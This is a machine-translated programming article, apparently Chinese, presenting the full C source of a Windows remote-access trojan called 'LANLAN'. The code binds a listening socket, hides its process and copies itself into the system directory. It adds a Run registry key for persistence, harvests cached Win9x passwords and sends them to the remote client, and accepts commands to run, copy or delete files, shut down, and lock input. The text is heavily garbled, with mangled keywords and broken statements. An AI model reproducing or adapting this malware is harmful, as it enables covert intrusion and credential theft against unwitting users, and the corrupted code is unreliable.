A simple Trojan example write articles generally assumed the source code. Except for the key section, don't love to play too much illustrative text, because it is more practical, about those functions and functions can go to the book, where to talk about who Details.
Here is given the asynchronous socket mode, directly call the Winsock API, Win SDK write Trojans (VC, C Builder next, commissioning through), no need to client, compile, dozens K. Realize some main functions, files Browse, upload, download (all support unparallerts), change the directory, get system information, remove passwords, execute files, display processes, send messages, shutdown, and some control functions, Win 9X, NT / 2000 Used, under NT, 2000, the program will be useless because of the case of cmd.exe has been renamed or does not exist. So do not call cmd.exe to complete, all by yourself, Win API implementation. To think It is not afraid of hassry. It is recommended that friends who write Trojans and network communications with ready-made controls should be familiar with these fundamentals, especially in network communication. If you are a programmer, I don't have to use me. Say, I haven't seen it in the development, which company hasn't seen it so that it is made with the current class (MFC, VCL).
This procedure is still not very robust. After writing, it has not been coming and optimized, mainly to make everyone familiar with Winsock and Win SDK programming.
/ / -------------------------------------------------------------------------------------------- --------------------------- // WINSOCK API, WIN SDK programming, no client // // author: Jia Jia // - -------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
#include
#include
#include
#pragma HDRSTOP
#include
#pragma argsused
#define run "//winmon32.exe"
// Register #define service_proc 1 // Uninstall service #define unservice_proc 0
#define th32cs_snapprocess 0x00000002 #define process_handle_name 255
// Buffer length #define dwbuffsize 2048 // Command line length #define dwcomm 50 #define port 9102 #define wm_socket wm_user 1 #define Prompt "Lanlan: //>"
DWord dwversion = makeword (1); dword dwflag = true; wsadata wsadata; socket createsock, news; sockaddr_in sock_in, newsock_in; lptstr szreadbuff, ob, tempBuff; int Addrlen;
// Cache Password structure typef strunt tagpassword_cache_entry {Word CBENTRY; Word CBRESOURCE; Word Cbpassword; Byte IEntry; Byte NTYPE; CHAR ABRESOURCE [1];} password_cache_entry;
TypeDef Bool (WinAPI * CacheCallback) (Password_cache_entry * PCE, DWORD);
// cache password function original TypedEf Word (WinApi * Pwneetenucached, DWORD CBPREFIX, DWORD NTYPE, CACHECALLBACK PFNCALLBACK, DWORD UNKNOWN);
// TOOLHELP32 structure typedef struct tagPROCESSENTRY32 {DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; DWORD th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; TCHAR szExeFile [MAX_PATH];} PROCESSENTRY32; typedef PROCESSENTRY32 * LPPROCESSENTRY32;
// define TOOLHELP32, PSAPI function pointer HANDLE (WINAPI * CreateToolhelp32Snapshot) (DWORD dwFlags, DWORD th32PD); BOOL (WINAPI * Process32First) (HANDLE hSnapshot, LPPROCESSENTRY32 pe); BOOL (WINAPI * Process32Next) (HANDLE hSnapshot, LPPROCESSENTRY32 pe); BOOL (WINAPI * EnumProcesses) (DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded); DWORD (WINAPI * GetModuleFileNameExA) (HANDLE hProcess, HMODULE hModule, LPTSTR lpstrFileName, DWORD nSize);
Hinstance Dllinst; DWORD (WinAPI * RegisterServiceProcess) (DWORD, DWORD);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Getos // Judgment Operating System // ------------- -------------------------------------------------- ----------------
DWORD WINAPI Getos () {OsversionInfo OS; Tchar Sversion [MAX_PATH];
Os.dwosveionsInfosize = SizeOf (OsversionInfo); GetversionEx (& OS); Switch (Os.dwplatformID) {CASE VER_PLATFORM_WIN32_WINDOWS: RETURN VER_PLATFORM_WIN32_WINDOWS;
Case Ver_Platform_Win32_NT: RETURN VER_PLATFORM_WIN32_NT;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // hideproc // Registration process // -------------- -------------------------------------------------- -----------
BOOL WINAPI HideProc (int mode) {DLLInst = LoadLibrary ( "KERNEL32.DLL"); if (DLLInst) {RegisterServiceProcess = (DWORD (WINAPI *) (DWORD, DWORD)) GetProcAddress (DLLInst, "RegisterServiceProcess"); if (RegisterServiceProcess {RegisterServiceProcess (GetCurrentProcessid (); return true;} else return false;} else returnaf false;} // ----------------------- -------------------------------------------------- - // enumprocess // enumeration process / / -------------------------------------- -------------------------------------
// Initialization TOOLHELP32 BOOL InitToolHelp32 () {HINSTANCE DLLinst = LoadLibrary ( "KERNEL32.DLL"); if (DLLinst) {CreateToolhelp32Snapshot = (HANDLE (WINAPI *) (DWORD dwFlags, DWORD th32PD)) GetProcAddress (DLLinst, "CreateToolhelp32Snapshot") ; Process32First = (BOOL (WINAPI *) (HANDLE hSnapshot, LPPROCESSENTRY32 pe)) GetProcAddress (DLLinst, "Process32First"); Process32Next = (BOOL (WINAPI *) (HANDLE hSnapshot, LPPROCESSENTRY32 pe)) GetProcAddress (DLLinst, "Process32Next") ; if (! (uint) createtoolhelp32snapshot) || (! (uint) process32first) || (! (uint) process32next) Return False; else return;} return false;}
// Initialization PSAPI BOOL InitPSAPI () {HINSTANCE PSAPI = LoadLibrary ( "PSAPI.DLL"); if (NULL == PSAPI) return FALSE; EnumProcesses = (BOOL (WINAPI *) (DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded )) GetProcAddress (PSAPI, "EnumProcesses"); GetModuleFileNameExA = (DWORD (WINAPI *) (HANDLE hProcess, HMODULE hModule, LPTSTR lpstrFileName, DWORD nSize)) GetProcAddress (PSAPI, "GetModuleFileNameExA"); if (NULL == EnumProcesses || NULL == getModuleFileName) Return False; Else Return True;
VOID WINAPI EnumProcess () {HANDLE process [255]; PROCESSENTRY32 p32; DWORD process_ids [255]; DWORD num_processes; TCHAR file_name [MAX_PATH]; TCHAR szTemp [MAX_PATH]; unsigned i; wsprintf (szTemp, "/ n / n / r << Process File Name >> / N / N / R "); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
switch (GetOS ()) {case VER_PLATFORM_WIN32_WINDOWS: if (InitToolHelp32 ()) {p32.dwSize = sizeof (PROCESSENTRY32); HANDLE pName = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, NULL); BOOL Next = Process32First (pName, & p32); i = 0; While (Next) {WSPrintf (Sztemp, "Process filename:% s /n/r" ,p32.szexefile); Send (NewSock, Sztemp, Lstrlen (Sztemp), 0); Process = OpenProcess (Process_Terminate, 0, P32. Th32ProcessID; Next = Process32Next (PNAME, & P32); i ;} closehandle (pname);
CASE VER_PLATFORM_WIN32_NT: IF (INTPSAPI ()) {EnumProcesses (Process_IDS, SIZEOF (Process_IDS), & Num_Processes); for (i = 0; i
{
Process = OpenProcess (Process_Query_Information | Process_VM_READ
, 0, Process_IDS;
IF (GetModuleFileNameExa (Process, Null, File_Name, Sizeof (file_name)))
WSPRINTF (SzTemp, "Process FileName:% S / N / R", File_Name);
Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
}
CloseHandle (Process);
}
Break;
}
}
/ / -------------------------------------------------------------------------------------------- --------------------------- // getcachepw // take cache password // ----------- -------------------------------------------------- ----------------
BOOL CALLBACK GetPass (PASSWORD_CACHE_ENTRY * pce, DWORD) {MoveMemory (szReadBuff, pce-> abResource, pce-> cbResource); szReadBuff [pce-> cbResource] = 0; CharToOem (szReadBuff, Ob); wsprintf (TempBuff, "/ n / N / R (UserName):% S / N / R (Password): ", OB); MoveMemory (SzreadBuff, PCE-> Abresource PCE-> CBRESOURCE, PCE-> CBPassword); szreadbuff [PCE-> Cbpassword] = 0; chartooem (szreadbuff, ob); LSTRCAT (TEMPBUFF, OB); Send (Newsock, Tempbuff, dwbuffsize, 0); return true;}
Bool WinAPI getCachePW () {tchar sztemp [max_path];
PWNETENUMCACHEDPASSWORDS WNETENUMCACHEDPASSWORDS; Hinstance Dllinst = LoadLibrary ("mpr.dll"); if (! Dllinst) {Return False;}
WSPrintf (Sztemp, "/ N / N / R << Win 9X Cache Password >> / N / R"); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
WNetEnumCachedPasswords = (PWNetEnumCachedPasswords) GetProcAddress (DLLinst, "WNetEnumCachedPasswords"); if (WNetEnumCachedPasswords!) {Return FALSE;} else {szReadBuff = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); Ob = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); TempBuff = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); WNetEnumCachedPasswords (0,0,0xff, GetPass, 0); HeapFree (GetProcessHeap (), dwBuffSize, szReadBuff); HeapFree ( GetProcessHeap (), dwbuffsize, ob); HeapFree (getProcessHeap (), dwbuffsize, tempbuff); freeElibrary (DLLINST);} return true;
/ / -------------------------------------------------------------------------------------------- --------------------------- // LoadProcess // Execute Document / / -------------- -------------------------------------------------- -----------
Bool WinApi LoadProcess (LPCTSTSTR SZFILENAME) {Startupinfo Si; Process_information Pi;
ZeroMemory (& si, sizeof (STARTUPINFO)); ZeroMemory (& pi, sizeof (PROCESS_INFORMATION)); si.cb = sizeof (STARTUPINFO); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (CreateProcess (szFileName, NULL, NULL , NULL, FALSE, 0, NULL, NULL, & Si, & PI) == false {Return False;} Return True;
/ / -------------------------------------------------------------------------------------------- --------------------------- // DIR // Browse file, support unparallerage // --------- -------------------------------------------------- ----------------
Void WinAPI Dir (LPCTSTR LPARAM) {Win32_Find_Data WFD; Handle Hhandle; Tchar SzFileName [MAX_PATH]; INT I;
WSPrintf (SZFileName, "/ N / N / R"); Send (Newsock, SzFileName, Lstrlen (SzFileName), 0);
LSTRCPY (SZFileName, LPARAM);
if (! (hHandle = FindFirstFile (szFileName, & wfd)) = INVALID_HANDLE_VALUE) {do {switch (wfd.dwFileAttributes) {case FILE_ATTRIBUTE_ARCHIVE: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / N / R ", wfd.cfilename, wfd.nfilesizelow; else WSPrintf (SZFileName,"% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizerow); Send (Newsock, SzFileName , lstrlen (szfilename), 0); Break; case file_attribute_directory: WSPrintf (SZFileName, "% - 20S% 10lu
/n/r",wfd.cFileName,wfd.nFileSizeLow); send (NewSock, szFileName, lstrlen (szFileName), 0); break; case FILE_ATTRIBUTE_HIDDEN: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizelow; Else Wsprintf (SZFileName,"% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizelow); send (NewSock, szFileName, lstrlen (szFileName), 0); break; case FILE_ATTRIBUTE_READONLY: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / n / r", wfd.cFileName, wfd .nFileSizeLow); else wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / n / r", wfd.cFileName, wfd.nFileSizeHigh wfd.nFileSizeLow); send (NewSock, szFileName, lstrlen (szFileName), 0); break Case file_attribute_system: if (wfd.nfilesizehigh == 0) WSPrintf (SZFileName, "% - 20S% 10lu Archive / N / R", wfd.cfilename, wfd.nfilesizelow; Else Wsprintf (SZFileName, "% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizelow; send (newsock, szfilename, lstrlen (szfilename), 0); Break;}} while (FindnextFile (HHHANDLE, & WFD)); } else {WSPrintf (SZFileName, "Can Not Find Directory or Files./N/R"); Send (Newsock, SzFileName, Lstrlen (SzFileName), 0);}} // ---------- -------------------------------------------------- --------------- // FileOpertion // File Operation Function / / ------------------------- --------------------------------------------------
Bool WinAPI FileOpertion (lpctstr szfilename1, lpctstr szfilename2, dword opt) {shfileopstruct shf; tchar sr [max_path]; tchar de [MAX_PATH];
LSTRCPY (SR, SZFileName1); SR [LSTRLEN (SR) 1] = '/ 0'; LSTRCPY (DE, SZFileName2); DE [LSTRLEN (DE) 1] = '/ 0';
ZeroMemory (& shf, sizeof (shf)); shf.hwnd = NULL; shf.wFunc = opt; shf.pFrom = sr; shf.pTo = de; shf.fFlags = FOF_ALLOWUNDO | FOF_SILENT | FOF_FILESONLY | FOF_MULTIDESTFILES | FOF_NOCONFIRMATION | FOF_NOCONFIRMMKDIR; IF (SHFILEOPERATION (& SHF)) Return False; Else Return True;}
/ / -------------------------------------------------------------------------------------------- --------------------------- // delete // Delete files (hidden, read-only), directory, support unparallerts // -------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Void WinAPI Delete (LPCTSTR LPARAM) {if (! FileOpertion)) Send (Newsock, "Delete File IS Fail", 20); Else Send (Newsock, "Delete File IS OK", 17 , 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Copy // Copy, upload, download file (you need to set your hard drive to completely sharing), Support Uniform // -------------------------------------------- -------------------------------
Void WinApi Copy (LPCTSTSTR LPARAM1, LPCTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTER LPARAM2) {IF (! FileOpertion (LPARAM1, LPARAM2, FO_COPY) Send (Newsock, "Copy File IS Fail", 18, 0); Else Send (Newsock, "Copy File IS OK" 15, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Ren // file, directory is renamed // ----------- -------------------------------------------------- ----------------
Void WinAPI Ren (LPCTSTSTR LPARAM1, LPCTSTSTSTSTSTSTSTSTSTR LPARAM2) {IF (! FileOpertion (LPARAM1, LPARAM2, FO_RENAME)) Send (Newsock, "Renname File IS Fail", 21, 0); Else Send (Newsock, "Reanme File IS OK" , 18, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // GetsysInfo // Get System Information / / ------------- -------------------------------------------------- ----------------
Void WinApi getsysinfo () {tchar szbuff [MAX_PATH]; tchar sztemp [max_path];
WSPrintf (SZBuff, "/ N / N / R <
> / n / N / r ");
Send (Newsock, SzBuff, Lstrlen (SzBuff), 0);
// Computer name DWord len = sizeof (sztemp); getcomputername (sztemp, & len); WSPrintf (SZBuff, "Computer Name:% S / N / N / R", SzTemp); Send (Newsock, SzBuff, Lstrlen (SZBuff) , 0);
// current operating system switch (GetOS ()) {case VER_PLATFORM_WIN32_WINDOWS: lstrcpy (szTemp, "Windows 9x"); break; case VER_PLATFORM_WIN32_NT: lstrcpy (szTemp, "Windows NT / 2000"); break;} wsprintf (szBuff, " Option System:% S / N / N / R ", SZTEMP); Send (Newsock, SZBuff, Lstrlen (SZBuff), 0);
// memory capacity MemoryStatus mem; mem.dwlength = sizeof (MEM); GlobalMemoryStatus (& MEM); WSPrintf (SZBuff, "Total Memroy:% DM / N / N / R", Mem.dwtotalphys / 1024/1024 1); Send (Newsock, SzBuff, Lstrlen (SzBuff), 0);
// system directory TCHAR szPath [MAX_PATH]; GetWindowsDirectory (szTemp, sizeof (szTemp)); GetSystemDirectory (szBuff, sizeof (szBuff)); wsprintf (szPath, "Windows Directory:% s / n / n / rSystem Directory:% s / N / N / R ", SZTEMP, SZBUFF; Send (Newsock, Szpath, Lstrlen (Szpath), 0);
// Drive and Partition Type Tchar SzFileSys [10];
For (int i = 0; i <26; i) {wsprintf (sztemp, "% c: //////////); uint utype = getDriveType (sztemp); switch (utype) {copy drive_fixed : GetVolumeInformation (Sztemp, Null, Null, Null, Null, Null, SzFilesys, Max_Path; WSPrintf (SZBuff, "Hard Disk:% S (% s) / N / N / R", SZTEMP, SZFILESYS); Send (Newsock , SZBuff, LSTRLEN (SZBUFF), 0); Break; Case Drive_CDROM: WSPrintf (SZBuff, "CD-ROM Disk:% S / N / N / R", SZTEMP; Send (Newsock, Szbuff, Lstrlen (SzBuff), 0); Break; Case Drive_Remote: GetVolumeInformation (Sztemp, Null, Null, Null, Null, Null, SzFilesys, Max_Path); WSPrintf (SZBuff, "Network Disk:% s (% s) / n / n / r", Sztemp , SZFILESYS); Send (Newsock, SzBuff, Lstrlen (SZBuff), 0); Break;}}
}
/ / -------------------------------------------------------------------------------------------- --------------------------- // EXITWIN / / Turn off the computer (Win 9X, NT / 2000) // ------ -------------------------------------------------- ------------------- Void WinApi EXITWIN () {DWORD DWVER; HANDLE HPROCESS, HTOKEN; Token_Privieges NewState; DWORD ProcessId, ReturnLength = 0; Luid LuidPrivileEluid;
DWVER = Getos (); if (dwver == ver_platform_win32_windows) EXITWINDOWSEX (1,0);
else if (dwVer == VER_PLATFORM_WIN32_NT) {ProcessId = GetCurrentProcessId (); hProcess = OpenProcess (PROCESS_ALL_ACCESS, FALSE, ProcessId); OpenProcessToken (hProcess, TOKEN_ADJUST_PRIVILEGES, & hToken); LookupPrivilegeValue (NULL, SE_SHUTDOWN_NAME, & luidPrivilegeLUID);
NewState.privilegegount = 1; newState.privileges [0] .luid = LuidPrivileGeluid; newState.privileges [0] .attributes = se_privilege_enable;
IF (AdjustTokenprivileges (Htoken, False, & NewState, Null, Null, NULL) EXITWINDOWSEX (EWX_FORCE | EWX_Poweroff, 0);}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // Ctrlcd / / Optical drive control // -------------- -------------------------------------------------- -----------
Void WinAPI Ctrlcd (HWND HWND, BOOL CTRL) {Switch (Ctrl) {Case: McISendstring ("Set CDAudio Door Open Wait", NULL, 0, HWND); Break; Case False: McIndString ("Set Cdaudio Door Closed Wait" , NULL, 0, HWND; Break;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // Popmsg // Send message // -------------- -------------------------------------------------- -----------
Void WinAPI Popmsg (lpctstr message, hwnd hwnd) {MessageBox (hwnd, message, "popmsg", mb_ok);
/ / -------------------------------------------------------------------------------------------- --------------------------- // ChangDir // Change the current directory // ------------- -------------------------------------------------- ------------ BOOL WINAPI CHANGEDIR (LPCTSTR SZDIR) {IF (SetCurrentDirectory (SZDIR)) Return True; Else Return False;}
/ / -------------------------------------------------------------------------------------------- --------------------------- // getCurpath // Get the current directory / / ------------- -------------------------------------------------- ----------------
Void WinAPI getCurpath () {tchar lpbuff [max_path]; tchar sztemp [max_path];
GetCurrentDirectory (MAX_PATH, LPBUF); WSPrintf (Sztemp, "CurrentDirect:% S / N / R", LPBUFF); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // hssys // Show, hidden desktop, taskbar // --------- -------------------------------------------------- ----------------
Void WinApi Hssys (HWND HWND, BOOL CTRL) {Switch (Ctrl) {Case False: HWnd = FindWindow ("Progman", NULL); ShowWindow (hwnd, sw_hide); hWnd = FindWindow ("sh * ll _trayWnd", NULL) ; ShowWindow (hWnd, SW_HIDE); break; case TRUE: hWnd = FindWindow ( "Progman", NULL); ShowWindow (hWnd, SW_SHOW); hWnd = FindWindow ( "Sh * ll _TrayWnd", NULL); ShowWindow (hWnd, SW_SHOW Break;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // LockMK // Lock mouse, function keys / / ----------- -------------------------------------------------- ----------------
VOID WINAPI LockMK (BOOL Ctrl) {RECT rc; switch (Ctrl) {case TRUE: ZeroMemory (& rc, sizeof (rc)); ClipCursor (& rc); SystemParametersInfo (SPI_SCREENSAVERRUNNING, TRUE, NULL, 0); SystemParametersInfo (SPI_SETFASTTASKSWITCH, TRUE , NULL, 0); break; case FALSE: ClipCursor (NULL); SystemParametersInfo (SPI_SCREENSAVERRUNNING, FALSE, NULL, 0); SystemParametersInfo (SPI_SETFASTTASKSWITCH, FALSE, NULL, 0); break;}} // ------ -------------------------------------------------- ------------------- // Execommand // execute command // ---------------------- -------------------------------------------------- ---
Void Execommand (lpctstr szcommand, hwnd hwnd) {tchar szbuf [MAX_PATH]; TCHAR param1 [100]; tchar param2 [100]; int 1;
IF ((LSTRCMP (Szcommand, "GetPW")) == 0) getCachePW ();
ELSE IF ((LSTRCMP (Szcommand, "GetInfo")) == 0) getsysInfo ();
ELSE IF ((LSTRCMP (Szcommand, "GCPATH")) == 0) getCurpath ();
Else IF ((LSTRCMP (SZCommand, "OpenCD"))) == 0) Ctrlcd (HWND, TRUE);
ELSE IF ((LSTRCMP (SZCommand, "CloseCD")) == 0) Ctrlcd (HWND, FALSE);
ELSE IF ((LSTRCMP (SZCommand, "Showsys"))) == 0) Hssys (hwnd, true);
ELSE IF ((LSTRCMP (Szcommand, "HIDESYS")))) == 0) Hssys (hwnd, false);
ELSE IF ((LSTRCMP (SZCommand, "Lockmk") == 0) LockMk (TRUE);
ELSE IF ((LSTRCMP (SZCommand, "UNLOCK")) == 0) LockMK (False);
ELSE IF ((LstrCMP (SZCommand, "DPROC") == 0) Enumprocess ();
ELSE IF ((LstrCMP (Szcommand, "EXITWIN")) == 0) exitwin ();
ELSE IF ((Strncmp (Szcommand, "POPMSG", LSTRLEN ("Popmsg"))) == 0) {if (lstrlen (szcommand) 2) {Send (Newsock, "Usage: POPMSG Message ", 28, 0);} for (i = lstrlen (" popmsg ") 1; IIF (szcommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("popmsg") 1);
POPMSG (param1, hwnd);
}
}
ELSE IF ((Strncmp (Szcommand, "Execfile", lstrlen ("execfile"))) == 0) {if (lstrlen (szcommand) <= lstrlen ("execFile" 2) {send (news, "usage: Execfile szfilename ", 28, 0);} for (i = lstrlen (" execfile ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
Lstrcpy (param1, szcommand lstrlen ("execfile") 1);
IF (loadProcess (param1) == false)
Send (Newsock, "Execfile Fail", 14, 0);
Else
Send (Newsock, "Execfile OK", 11, 0);
}
}
ELSE IF ((SZCMMP (SZCMMAND, "CD", LSTRLEN ("CD")))) == 0) {IF (lstrlen (szcommand) <= LSTRLEN ("CD") 2) {Send (Newsock, "CD Drive // Directory ", 19, 0);} for (i = lstrlen (" cd ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen) 1);
ChangeDir (param1) == false)
Send (Newsock, "Change Directory Fail", 21, 0);
Else
Send (Newsock, "Change Directory OK", 19, 0);
}
}
Else IF ((Strncmp (SZCMMAND, "DIR", LSTRLEN ("DIR"))) == 0) {IF (lstrlen (szcommand) <= lstrlen ("DIR") 2) {DIR ("*. *" );} for (i = lstrlen ("dir") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("dir") 1);
DIR (param1);
}
}
Else IF ((SZCMMP (SZCMMAND, "DEL", LSTRLEN ("DEL"))) == 0) {IF (lstrlen (szcommand) <= lstrlen ("del") 2) {send (newsock, "usage: Del SzFileName ", 28, 0);} for (i = lstrlen (" del ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
Lstrcpy (param1, szcommand lstrlen ("del") 1);
Delete (param1);
}
}
ELSE IF ((Strncmp (Szcommand, "Copy", LStrlen ("Copy"))) == 0) {IF (Lstrlen (Szcommand) <= LSTRLEN ("Copy") 2) {Send (Newsock, "Usage: Copy Drive // FileName ", 28, 0); Return;} for (i = lstrlen (" copy ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("copy") 1);
LSTRCPY (param2, ");
Send (Newsock, "Copy File1 To File2", 19, 0);
}
Else
{
LSTRCPY (SZBUF, SZCommand);
SZBUF = 0;
LSTRCPY (param1, szbuf lstrlen ("copy") 1);
LSTRCPY (param2, szbuf i 1);
Copy (Param1, Param2);
}
}
ELSE IF ((Strncmp (SZCMMAND, "REN", LSTRLEN ("Ren"))) == 0) {IF (Lstrlen (SZCommand) <= LSTRLEN ("Ren") 2) {Send (Newsock, "Usage: Ren Drive // FileName ", 28, 0); Return;} for (i = lstrlen (" ren ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("ren") 1);
LSTRCPY (param2, ");
Send (Newsock, "Ren File1 To File2", 19, 0);
}
Else
{
LSTRCPY (SZBUF, SZCommand);
SZBUF = 0;
LSTRCPY (param1, szbuf lstrlen ("ren") 1);
LSTRCPY (param2, szbuf i 1);
Ren (param1, param2);
}
Else Send (Newsock, "Bad Command !!!", 16, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // INITSOCKET / / Initialization Socket / / -------------- -------------------------------------------------- ------------
Bool WinAPI INITSOCKET (HWND HWND) {IF ((WSAStartup (Wsadata))! = 0) {MessageBox (hwnd, "init socket error", null, mb_ok); return false;}
Createsock = Socket (AF_INET, SOCK_STREAM, 0); if (createSock == Socket_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "socket error", null, mb_ok); return false;}
Sock_in.sin_family = AF_INET; SOCK_IN.SIN_PORT = HTONS (port); sock_in.sin_addr.s_un.s_addr = HTONL (INADDR_ANY);
Setsockopt (Createsock, SOL_Socket, SO_REUSEADDR, (LPSTR) & dwflag, sizeof (dwflag));
IF (Bind (Createsock, (LPSOCKADDR) == SOCKET_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "bind error", null, mb_ok); return false;}
Else IF (Listen (Createsock, 3) == Socket_ERROR) {CloseSocket (Createsock); MessageBox (HWnd, "Listen Error", NULL, MB_OK; RETURN FALSE;}
Else IF (Createsock, Hwnd, WM_Socket, FD_ACCEPT | FD_CLOSE) == Socket_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "wsaselect error", null, mb_ok); Return False;}
Addrlen = Sizeof (SockAddr_in);
Return True;}
/ / -------------------------------------------------------------------------------------------- ---------------------------
Lresult Callback WndProc (HWND HWND, UINT MESSAGE, WPARAM WPARAM, LPARAM LPARAM) {
Static tchar szcommand [dwcomm]; static tchar szexec [dwcomm];
Switch (Message) {Case WM_Socket: IF (WsagetSelectError (LPARAM)) {CloseSocket (WPARAM); Break;}
switch (WSAGETSELECTEVENT (lParam)) {// connector case FD_ACCEPT: NewSock = accept (CreateSock, (LPSOCKADDR) & NewSock_in, & addrlen); WSAAsyncSelect (NewSock, hWnd, WM_SOCKET, FD_READ | FD_WRITE | FD_CLOSE); wsprintf (szCommand, "LANLAN Ver 1.0 Write By Virus / N / N / R% S ", Prompt); Send (Newsock, Szcommand, DWCOMM, 0); Break; // Read input, if the carriage return, execute command // is not copied to buffer Area Case FD_READ: ZeromeMory (Szcommand, DWCOMM); Recv (Newsock, Szcommand, DWComm, 0); if (Szcommand [0] == VK_RETURN) {WSPrintf (Szcommand, "/ N / N / R% S", prompt) Send (Newsock, Szcommand, DWcomm, 0); Execommand (Szexec, Hwnd); ZeromeMory (Szec, DWComm);} else lstrcat; send (newsock, szcommand, dwcomm, 0); BREAK;
Case FD_Close: CloseSocket (WPARAM); BREAK;} Break;
Case WM_DESTROY: HIDEPROC (Unservice_Proc); PostquitMessage (0); Break;
Default: Return DefwindowProc (HWnd, Message, WPARAM, LPARAM);
} Return 0;}
/ / -------------------------------------------------------------------------------------------- ---------------------------
WINAPI WinMain (HINSTANCE hInstance, HINSTANCE, LPSTR, int) {HWND hWnd; MSG msg; WNDCLASS wndc; LPSTR szAppName = "LANLAN"; HKEY hKey = 0; DWORD disp = 0; LONG lResult; TCHAR szKey [MAX_PATH]; TCHAR szSysDir [MAX_PATH 25]; Tchar SzFileName [MAX_PATH];
wndc.style = 0; wndc.lpfnWndProc = WndProc; wndc.cbClsExtra = 0; wndc.cbWndExtra = 0; wndc.hInstance = hInstance; wndc.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndc.hCursor = LoadCursor (NULL, IDC_ARROW ); wndc.hbrbackground = (hbrush) (color_window 1); wndc.lpszMenuname = null; wndc.lpszclassname = szappname; registerclass (& WNDC);
HWnd = CREATEWINDOW (Szappname, "LanlanServer", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, HINSTANCE, NULL;
ShowWindow (hwnd, sw_hide); updateWindow (hwnd); if (GetOS () == ver_platform_win32_windows) {hideproc (service_proc);} initsocket (hwnd); // copy file to system directory / / and load registry, automatic operation
GetSystemDirectory (szsysdir, max_path); LSTRCAT (SZSYSDIR, RUN); getModuleFileName (Null, SzFileName, Max_Path); CopyFile (SZFileName, Szsysdir, False);
lstrcpy (szKey, "SOFTWARE // Microsoft // Windows // CurrentVersion // Run"); lResult = RegCreateKeyEx (HKEY_LOCAL_MACHINE, szKey, 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, & hKey, & disp);
IF (LRESULT == Error_Success) {LRESULT = RegSetValueex (HKEY, "WINMON32", 0, REG_SZ, SZSYSDIR, LSTRLEN (SZSYSDIR); RegcloseKey (HKEY);}
While (GetMessage (& MSG, NULL, 0, 0)) {TranslateMessage (& MSG); DispatchMessage (& MSG);
Return (msg.wparam);